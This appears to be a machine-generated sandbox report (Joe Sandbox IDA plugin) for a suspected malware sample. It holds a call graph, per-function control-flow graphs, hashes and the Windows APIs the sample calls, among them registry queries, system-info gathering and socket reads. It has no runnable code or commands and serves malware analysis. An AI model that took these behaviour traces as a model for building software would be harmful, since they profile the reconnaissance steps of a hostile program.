11760->11758 11761->11760 11762 516237 __fassign 4 API calls 11761->11762 11762->11760 11764 51700d 11763->11764 11765 516ffe __dosmaperr __freea 11763->11765 11764->11765 11766 51a2bb __fassign RtlAllocateHeap 11764->11766 11765->11742 11766->11765 11768 51caaa __cftof __dosmaperr 11767->11768 11769 51cac0 11767->11769 11768->11748 11769->11768 11770 51cb5c 11769->11770 11771 51cb57 11769->11771 11780 51c2b1 11770->11780 11773 51cb80 11771->11773 11774 51cbb6 11771->11774 11775 51cb85 11773->11775 11776 51cb9e 11773->11776 11797 51c5ca 11774->11797 11786 51c910 11775->11786 11793 51c7b4 11776->11793 11781 51c2c3 11780->11781 11782 516237 __fassign 4 API calls 11781->11782 11783 51c2d7 11782->11783 11784 51c5ca 4 API calls 11783->11784 11785 51c2df __alldvrm __cftof __dosmaperr _strrchr 11783->11785 11784->11785 11785->11768 11787 51c93e 11786->11787 11788 51c977 11787->11788 11789 51c9b0 11787->11789 11791 51c989 11787->11791 11788->11768 11804 51c66c 11789->11804 11801 51c83f 11791->11801 11794 51c7e1 11793->11794 11795 51c83f 4 API calls 11794->11795 11796 51c820 11794->11796 11795->11796 11796->11768 11798 51c5e2 11797->11798 11799 51c647 11798->11799 11800 51c66c 4 API calls 11798->11800 11799->11768 11800->11799 11802 516237 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11801->11802 11803 51c855 __cftof 11802->11803 11803->11788 11805 51c67d 11804->11805 11806 516237 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11805->11806 11807 51c68b __cftof __dosmaperr 11805->11807 11808 51c6ac __cftof ___std_exception_copy 11806->11808 11807->11788 11809 4e7710 11810 4e787a 11809->11810 11813 4e7768 shared_ptr 11809->11813 11811 4f7360 RtlAllocateHeap 11811->11813 11812 4e5190 RtlAllocateHeap 11812->11813 11813->11810 11813->11811 11813->11812 11814 4e78b0 11813->11814 11815 4f7a20 RtlAllocateHeap 11813->11815 11816 4f7b60 RtlAllocateHeap 11814->11816 11815->11813 11816->11810 11817 4e7310 11821 4e7430 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11817->11821 11822 4e7365 shared_ptr 11817->11822 11818 4e74f7 11820 4f7b60 RtlAllocateHeap 11818->11820 11819 4f7a20 RtlAllocateHeap 11819->11822 11820->11821 11822->11818 11822->11819 11822->11821 12280 4ec990 recv 12281 4ec9f2 recv 12280->12281 12282 4eca27 recv 12281->12282 12283 4eca61 12282->12283 12284 4ecb83 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 12283->12284 12285 4fc00c GetSystemTimePreciseAsFileTime 12283->12285 12286 4ecbbe 12285->12286 12287 4fbbca 6 API calls 12286->12287 12288 4ecc28 12287->12288 11847 4f8130 11848 4fcd47 RtlAllocateHeap 11847->11848 11849 4f818a __cftof 11848->11849 11857 4f9510 11849->11857 11855 4f81cc __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11856 4f823f 11873 4f9850 11857->11873 11859 4f9545 11877 4e2bc0 11859->11877 11861 4f9576 11886 4f98d0 11861->11886 11863 4f81b4 11863->11855 11864 4e42d0 11863->11864 11865 4fb83f InitOnceExecuteOnce 11864->11865 11866 4e42ea 11865->11866 11867 4e42f1 11866->11867 11868 5165e8 5 API calls 11866->11868 11870 4fb7b0 11867->11870 11869 4e4304 11868->11869 12222 4fb6eb 11870->12222 11872 4fb7c6 std::_Throw_future_error 11872->11856 11874 4f986c 11873->11874 11892 4fbfeb 11874->11892 11876 4f9877 11876->11859 11878 4e2bfd 11877->11878 11910 4fb83f 11878->11910 11880 4e2c26 11881 4e2c31 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11880->11881 11882 4e2c68 11880->11882 11913 4fb857 11880->11913 11881->11861 11922 4e2320 11882->11922 12039 4e3720 11886->12039 11889 4f99b8 11890 4f994f shared_ptr 11890->11889 12047 4f9b70 11890->12047 11891 4f999b 11891->11863 11895 4fbd35 11892->11895 11894 4fbffb 11894->11876 11896 4fbd41 11895->11896 11897 4fbd4b 11895->11897 11898 4fbcfe 11896->11898 11899 4fbd1e 11896->11899 11897->11894 11898->11897 11904 4fc635 11898->11904 11908 4fc66a 11899->11908 11902 4fbd30 11902->11894 11905 4fbd17 11904->11905 11906 4fc643 InitializeCriticalSectionEx 11904->11906 11905->11894 11906->11905 11909 4fc67f RtlInitializeConditionVariable 11908->11909 11909->11902 11925 4fc591 11910->11925 11914 4fb863 11913->11914 11929 4e27e0 11914->11929 11916 4fb883 std::_Throw_future_error 11917 4fb8ca 11916->11917 11918 4fb8d3 11916->11918 11937 4fb7df 11917->11937 11943 4e29c0 11918->11943 11921 4fb8cf 11921->11882 12034 4faf36 11922->12034 11924 4e2352 11926 4fc59f InitOnceExecuteOnce 11925->11926 11928 4fb852 11925->11928 11926->11928 11928->11880 11930 4f7a20 RtlAllocateHeap 11929->11930 11931 4e282f 11930->11931 11959 4e2590 11931->11959 11933 4e286d shared_ptr 11933->11916 11934 4e2847 11934->11933 11935 51320c ___std_exception_copy RtlAllocateHeap 11934->11935 11936 4e28c4 11935->11936 11936->11916 11938 4fc591 InitOnceExecuteOnce 11937->11938 11939 4fb7f7 11938->11939 11940 4fb7fe 11939->11940 11968 5165e8 11939->11968 11940->11921 11942 4fb807 11942->11921 11944 4fb83f InitOnceExecuteOnce 11943->11944 11954 4e29d4 __fassign 11944->11954 11945 4e29df 11945->11921 11946 5183e9 __fassign 3 API calls 11947 516623 11946->11947 11948 516640 11947->11948 11949 516632 11947->11949 11950 5162ba 4 API calls 11948->11950 11951 516696 5 API calls 11949->11951 11953 51665a 11950->11953 11952 51663c 11951->11952 11952->11921 11955 51621a RtlAllocateHeap 11953->11955 11954->11945 11954->11946 11956 516667 11955->11956 11957 516696 5 API calls 11956->11957 11958 51666e __freea 11956->11958 11957->11958 11958->11921 11960 4f7360 RtlAllocateHeap 11959->11960 11961 4e25e2 11960->11961 11962 4e2605 11961->11962 11963 4f88a0 RtlAllocateHeap 11961->11963 11964 4f88a0 RtlAllocateHeap 11962->11964 11966 4e266e shared_ptr 11962->11966 11963->11962 11964->11966 11965 51320c ___std_exception_copy RtlAllocateHeap 11967 4e272b shared_ptr ___std_exception_destroy __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11965->11967 11966->11965 11966->11967 11967->11934 11969 5165f4 __fassign 11968->11969 11970 5183e9 __fassign 3 API calls 11969->11970 11971 516623 11970->11971 11972 516640 11971->11972 11973 516632 11971->11973 11974 5162ba 4 API calls 11972->11974 11982 516696 11973->11982 11977 51665a 11974->11977 11976 51663c 11976->11942 11978 51621a RtlAllocateHeap 11977->11978 11979 516667 11978->11979 11980 516696 5 API calls 11979->11980 11981 51666e __freea 11979->11981 11980->11981 11981->11942 11983 5166c1 __cftof 11982->11983 11986 5166a4 __cftof __dosmaperr 11982->11986 11984 516735 11983->11984 11985 516727 11983->11985 11989 5166e7 __cftof __dosmaperr 11983->11989 11994 516774 11984->11994 11990 5167fe 11985->11990 11986->11976 11989->11976 11991 516825 __cftof 11990->11991 11993 516894 __dosmaperr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 11991->11993 12000 516ac6 11991->12000 11993->11989 12021 516d11 11994->12021 11996 516782 11997 516787 __dosmaperr 11996->11997 11998 516ac6 4 API calls 11996->11998 11997->11989 11999 5167a0 11998->11999 11999->11989 12002 516adc _wcsrchr 12000->12002 12001 516b53 12001->11993 12002->12001 12010 51b2e5 12002->12010 12004 516b20 12004->12001 12005 51b2e5 4 API calls 12004->12005 12006 516b31 12005->12006 12006->12001 12007 51b2e5 4 API calls 12006->12007 12008 516b42 12007->12008 12008->12001 12009 51b2e5 4 API calls 12008->12009 12009->12001 12011 51b2f3 12010->12011 12014 51b2f9 __cftof __dosmaperr 12011->12014 12015 51b32e 12011->12015 12013 51b329 12013->12004 12014->12004 12016 51b358 12015->12016 12017 51b33e __cftof __dosmaperr 12015->12017 12016->12017 12018 516237 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12016->12018 12017->12013 12019 51b382 12018->12019 12019->12017 12020 51b2a6 GetPEB ExitProcess GetPEB RtlAllocateHeap 12019->12020 12020->12019 12022 516d35 12021->12022 12024 516d3b ___std_exception_destroy __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 12022->12024 12025 516a33 12022->12025 12024->11996 12026 516a3f __dosmaperr 12025->12026 12031 51b17c 12026->12031 12028 516a65 12028->12024 12029 516a57 __dosmaperr 12029->12028 12030 51b17c RtlAllocateHeap 12029->12030 12030->12028 12032 51afdf RtlAllocateHeap 12031->12032 12033 51b195 12032->12033 12033->12029 12035 4faf51 std::_Throw_future_error 12034->12035 12036 5183e9 __fassign 3 API calls 12035->12036 12038 4fafb8 __fassign __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 12035->12038 12037 4fafff 12036->12037 12038->11924 12040 4e37d6 12039->12040 12044 4e373f 12039->12044 12040->11890 12041 4f8b40 RtlAllocateHeap 12042 4e3805 12041->12042 12042->11890 12044->12040 12045 4e37ad shared_ptr 12044->12045 12046 4e37fb 12044->12046 12060 4f76b0 12045->12060 12046->12041 12048 4f9bf0 12047->12048 12083 4f6ab0 12048->12083 12050 4f9c2c 12052 4f76b0 RtlAllocateHeap 12050->12052 12053 4f9c90 12050->12053 12051 4e3720 RtlAllocateHeap 12054 4f9cfe shared_ptr 12051->12054 12052->12053 12053->12051 12055 4f9e1e shared_ptr 12054->12055 12056 4fcd47 RtlAllocateHeap 12054->12056 12055->11891 12057 4f9dbe 12056->12057 12095 4e3dc0 12057->12095 12059 4f9e06 12059->11891 12061 4f772b 12060->12061 12062 4f76c2 12060->12062 12063 4e2360 RtlAllocateHeap 12061->12063 12064 4f76cd 12062->12064 12065 4f76fc 12062->12065 12073 4f76da 12063->12073 12064->12061 12067 4f76d4 12064->12067 12066 4f7719 12065->12066 12068 4fcd47 RtlAllocateHeap 12065->12068 12066->12040 12069 4fcd47 RtlAllocateHeap 12067->12069 12070 4f7706 12068->12070 12069->12073 12070->12040 12071 4f7880 12072 4f8bd0 RtlAllocateHeap 12071->12072 12082 4f77f1 shared_ptr 12072->12082 12073->12071 12074 4f76e3 12073->12074 12075 4f787b 12073->12075 12076 4f7807 12073->12076 12077 4f77e0 12073->12077 12074->12040 12078 4e2360 RtlAllocateHeap 12075->12078 12081 4fcd47 RtlAllocateHeap 12076->12081 12076->12082 12077->12075 12079 4f77eb 12077->12079 12078->12071 12080 4fcd47 RtlAllocateHeap 12079->12080 12080->12082 12081->12082 12082->12040 12084 4f6af1 12083->12084 12085 4fcd47 RtlAllocateHeap 12084->12085 12086 4f6b18 12085->12086 12101 4e3850 12086->12101 12089 4fcd47 RtlAllocateHeap 12091 4f6c9b __cftof 12089->12091 12090 4f6d26 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 12090->12050 12092 4fbfeb __Mtx_init_in_situ 2 API calls 12091->12092 12093 4f6ce1 12092->12093 12106 4e2da0 12093->12106 12096 4e3e28 12095->12096 12100 4e3dfe 12095->12100 12098 4e3e38 12096->12098 12186 4e2ae0 12096->12186 12098->12059 12100->12059 12102 4fbfeb __Mtx_init_in_situ 2 API calls 12101->12102 12103 4e3887 12102->12103 12104 4fbfeb __Mtx_init_in_situ 2 API calls 12103->12104 12105 4e38c6 12104->12105 12105->12089 12105->12090 12107 4e2de6 12106->12107 12110 4e2e4f 12106->12110 12142 4fc00c 12107->12142 12118 4fc00c GetSystemTimePreciseAsFileTime 12110->12118 12127 4e2ecf 12110->12127 12111 4e2efe 12145 4fbbca 12111->12145 12112 4e2dfd 12115 4fcd47 RtlAllocateHeap 12112->12115 12117 4e2e10 __Mtx_unlock 12112->12117 12114 4e2f04 12116 4fbbca 6 API calls 12114->12116 12115->12117 12119 4e2e99 12116->12119 12117->12110 12117->12114 12118->12119 12120 4fbbca 6 API calls 12119->12120 12121 4e2ea0 __Mtx_unlock 12119->12121 12120->12121 12122 4fbbca 6 API calls 12121->12122 12124 4e2eb8 __Cnd_broadcast 12121->12124 12122->12124 12123 4fbbca 6 API calls 12125 4e2f1c 12123->12125 12124->12123 12124->12127 12126 4fc00c GetSystemTimePreciseAsFileTime 12125->12126 12137 4e2f60 shared_ptr __Mtx_unlock 12126->12137 12127->12090 12128 4e30a5 12129 4fbbca 6 API calls 12128->12129 12130 4e30ab 12129->12130 12131 4fbbca 6 API calls 12130->12131 12132 4e30b1 12131->12132 12133 4fbbca 6 API calls 12132->12133 12139 4e3073 __Mtx_unlock 12133->12139 12134 4e3087 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 12134->12090 12135 4fbbca 6 API calls 12136 4e30bd 12135->12136 12137->12128 12137->12130 12137->12134 12138 4fc00c GetSystemTimePreciseAsFileTime 12137->12138 12140 4e303f 12138->12140 12139->12134 12139->12135 12140->12128 12140->12132 12140->12139 12149 4fb6ac 12140->12149 12152 4fbdb2 12142->12152 12144 4e2df2 12144->12111 12144->12112 12146 4fbbf2 12145->12146 12147 4fbbd4 12145->12147 12146->12146 12147->12146 12169 4fbbf7 12147->12169 12180 4fb4d2 12149->12180 12151 4fb6bc 12151->12140 12153 4fbdda __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 12152->12153 12154 4fbe08 12152->12154 12153->12144 12154->12153 12158 4fc8cb 12154->12158 12156 4fbe5d __Xtime_diff_to_millis2 12156->12153 12157 4fc8cb _xtime_get GetSystemTimePreciseAsFileTime 12156->12157 12157->12156 12159 4fc8da 12158->12159 12161 4fc8e7 __aulldvrm 12158->12161 12159->12161 12162 4fc8a4 12159->12162 12161->12156 12165 4fc54a 12162->12165 12166 4fc55b GetSystemTimePreciseAsFileTime 12165->12166 12168 4fc567 12165->12168 12166->12168 12168->12161 12170 4e29c0 6 API calls 12169->12170 12171 4fbc0e 12170->12171 12174 4fbb5f 12171->12174 12173 4fbc1f std::_Throw_future_error 12173->12147 12175 4fbb6b 12174->12175 12176 4f7a20 RtlAllocateHeap 12175->12176 12177 4fbb9d 12176->12177 12178 4e2590 RtlAllocateHeap 12177->12178 12179 4fbbb2 12178->12179 12179->12173 12181 4fb4fc 12180->12181 12182 4fc8cb _xtime_get GetSystemTimePreciseAsFileTime 12181->12182 12185 4fb504 __Xtime_diff_to_millis2 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 12181->12185 12183 4fb52f __Xtime_diff_to_millis2 12182->12183 12184 4fc8cb _xtime_get GetSystemTimePreciseAsFileTime 12183->12184 12183->12185 12184->12185 12185->12151 12187 4fcd47 RtlAllocateHeap 12186->12187 12188 4e2aee 12187->12188 12196 4fb1a7 12188->12196 12190 4e2b22 12191 4e2b29 12190->12191 12202 4e2b60 12190->12202 12191->12059 12193 4e2b38 12205 4e2440 12193->12205 12195 4e2b45 std::_Throw_future_error 12197 4fb1b4 12196->12197 12201 4fb1d3 Concurrency::details::_Reschedule_chore 12196->12201 12208 4fc4d7 12197->12208 12199 4fb1c4 12199->12201 12210 4fb17e 12199->12210 12201->12190 12216 4fb15b 12202->12216 12204 4e2b92 shared_ptr 12204->12193 12206 51320c ___std_exception_copy RtlAllocateHeap 12205->12206 12207 4e2477 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 12206->12207 12207->12195 12209 4fc4f2 CreateThreadpoolWork 12208->12209 12209->12199 12211 4fb187 Concurrency::details::_Reschedule_chore 12210->12211 12214 4fc72c 12211->12214 12213 4fb1a1 12213->12201 12215 4fc741 TpPostWork 12214->12215 12215->12213 12217 4fb177 12216->12217 12218 4fb167 12216->12218 12217->12204 12218->12217 12220 4fc3d8 12218->12220 12221 4fc3ed TpReleaseWork 12220->12221 12221->12217 12223 4e21c0 std::invalid_argument::invalid_argument RtlAllocateHeap 12222->12223 12224 4fb6ff 12223->12224 12224->11872

                                                                                              Executed Functions

                                                                                              Function 00515E8B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 458 515e8b-515e98 call 519b02 461 515eba-515ecc call 515ecd ExitProcess 458->461 462 515e9a-515ea8 GetPEB 458->462 462->461 463 515eaa-515eb9 462->463 463->461
                                                                                              APIs
                                                                                              • ExitProcess.KERNEL32(00000000,?,00515E8A,?,?,00000000,?), ref: 00515EC7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0
                                                                                              • Opcode ID: 92b134a9951668fa05e22c165e6dff4f25cae855c024654a1bca2af359b50b6d
                                                                                              • Instruction ID: 2e35ca46edadf61a88eb8d4cf0cab8b607cea57ea413f1511038260ac30a552d
                                                                                              • Opcode Fuzzy Hash: 92b134a9951668fa05e22c165e6dff4f25cae855c024654a1bca2af359b50b6d
                                                                                              • Instruction Fuzzy Hash: 2AE08630451648EFEF257B14D959D9D3F5EFB91352F441900FC0446221DB35EE81C580
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04ED0C6D Relevance: .1, Instructions: 69COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 566 4ed0c6d-4ed0c8e 568 4ed0c95-4ed0d00 566->568
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1670194124.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4ed0000_wIaKimJFke.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a3f919fc1ef67af54799255ceeb90c2959bfeb3b0f955bbf907d9dc7310b115
                                                                                              • Instruction ID: 0655fb7c6e5dff5feed06ff385d7fcbfa1b9ec3ea293553016ba5cc3efdafd97
                                                                                              • Opcode Fuzzy Hash: 1a3f919fc1ef67af54799255ceeb90c2959bfeb3b0f955bbf907d9dc7310b115
                                                                                              • Instruction Fuzzy Hash: 6CF054EB24D1247CB051D1823F18AFB576DE1C2730335D86BF802D1446E2C90A5E2135
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004E52E0 Relevance: 4.6, APIs: 3, Instructions: 134registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 004E535D
                                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,?), ref: 004E538B
                                                                                              • RegCloseKey.KERNELBASE(?), ref: 004E5397
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: 452a51b6780106ba118cc7b53a4ad7f25aa8774f798ac47c94cca4068ed73505
                                                                                              • Instruction ID: 66b789ec866279a1e37417fcc23edfd63b9d0caa97a33c363b775bc35500a23a
                                                                                              • Opcode Fuzzy Hash: 452a51b6780106ba118cc7b53a4ad7f25aa8774f798ac47c94cca4068ed73505
                                                                                              • Instruction Fuzzy Hash: 654126B160014C9BEB24CF14CC85BEE7BB9EF45308F10866DFA15972C1D7799AC48BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004E6B70 Relevance: 2.1, APIs: 1, Instructions: 551COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 125 4e6b70-4e6bf2 call 513a50 129 4e70da-4e70f7 call 4fc951 125->129 130 4e6bf8-4e6c20 call 4f7360 call 4e5190 125->130 137 4e6c24-4e6c46 call 4f7360 call 4e5190 130->137 138 4e6c22 130->138 143 4e6c4a-4e6c63 137->143 144 4e6c48 137->144 138->137 147 4e6c94-4e6cbf 143->147 148 4e6c65-4e6c74 143->148 144->143 151 4e6cf0-4e6d11 147->151 152 4e6cc1-4e6cd0 147->152 149 4e6c8a-4e6c91 call 4fcfc8 148->149 150 4e6c76-4e6c84 148->150 149->147 150->149 155 4e70f8 call 516597 150->155 153 4e6d17-4e6d1c 151->153 154 4e6d13-4e6d15 GetNativeSystemInfo 151->154 157 4e6ce6-4e6ced call 4fcfc8 152->157 158 4e6cd2-4e6ce0 152->158 160 4e6d1d-4e6d26 153->160 154->160 167 4e70fd-4e7191 call 516597 call 513a50 155->167 157->151 158->155 158->157 165 4e6d28-4e6d2f 160->165 166 4e6d44-4e6d47 160->166 168 4e70d5 165->168 169 4e6d35-4e6d3f 165->169 170 4e6d4d-4e6d56 166->170 171 4e707b-4e707e 166->171 200 4e719d-4e71c5 call 4f7360 call 4e5190 167->200 201 4e7193-4e7198 167->201 168->129 173 4e70d0 169->173 174 4e6d58-4e6d64 170->174 175 4e6d69-4e6d6c 170->175 171->168 176 4e7080-4e7089 171->176 173->168 174->173 178 4e7058-4e705a 175->178 179 4e6d72-4e6d79 175->179 180 4e708b-4e708f 176->180 181 4e70b0-4e70b3 176->181 186 4e705c-4e7066 178->186 187 4e7068-4e706b 178->187 188 4e6d7f-4e6dd6 call 4f7360 call 4e5190 call 4f7360 call 4e5190 call 4e52e0 179->188 189 4e6e54-4e7041 call 4f7360 call 4e5190 call 4f7360 call 4e5190 call 4e52e0 call 4f7360 call 4e5190 call 4e4cb0 call 4f7360 call 4e5190 call 4f7360 call 4e5190 call 4e52e0 call 4f7360 call 4e5190 call 4e4cb0 call 4f7360 call 4e5190 call 4f7360 call 4e5190 call 4e52e0 call 4f7360 call 4e5190 call 4e4cb0 179->189 190 4e70a4-4e70ae 180->190 191 4e7091-4e7096 180->191 184 4e70b5-4e70bf 181->184 185 4e70c1-4e70cd 181->185 184->168 185->173 186->173 187->168 195 4e706d-4e7079 187->195 225 4e6ddb-4e6de2 188->225 244 4e7047-4e7050 189->244 190->168 191->190 193 4e7098-4e70a2 191->193 193->168 195->173 219 4e71c9-4e71eb call 4f7360 call 4e5190 200->219 220 4e71c7 200->220 204 4e72df-4e72fb call 4fc951 201->204 237 4e71ef-4e7208 219->237 238 4e71ed 219->238 220->219 229 4e6de6-4e6e06 call 5183bb 225->229 230 4e6de4 225->230 240 4e6e3d-4e6e3f 229->240 241 4e6e08-4e6e17 229->241 230->229 254 4e720a-4e7219 237->254 255 4e7239-4e7264 237->255 238->237 240->244 245 4e6e45-4e6e4f 240->245 246 4e6e2d-4e6e3a call 4fcfc8 241->246 247 4e6e19-4e6e27 241->247 244->171 250 4e7052 244->250 245->244 246->240 247->167 247->246 250->178 257 4e722f-4e7236 call 4fcfc8 254->257 258 4e721b-4e7229 254->258 260 4e7266-4e7275 255->260 261 4e7291-4e72b2 255->261 257->255 258->257 264 4e72fc-4e7301 call 516597 258->264 267 4e7287-4e728e call 4fcfc8 260->267 268 4e7277-4e7285 260->268 262 4e72b8-4e72bd 261->262 263 4e72b4-4e72b6 261->263 278 4e72be-4e72c5 262->278 263->278 267->261 268->264 268->267 278->204 280 4e72c7-4e72cf 278->280 282 4e72d8-4e72db 280->282 283 4e72d1-4e72d6 280->283 282->204 285 4e72dd 282->285 283->204 285->204
                                                                                              APIs
                                                                                              • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004E6D13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoNativeSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1721193555-0
                                                                                              • Opcode ID: 3f2fd3334294a15f7184f53d6f1be852731d885f0f5ad08d5a13779d675f1b31
                                                                                              • Instruction ID: 109755f69e6050f4c0efa1f08a5322a3cf5c16464eb2a0f7d3d0bbf463ac628f
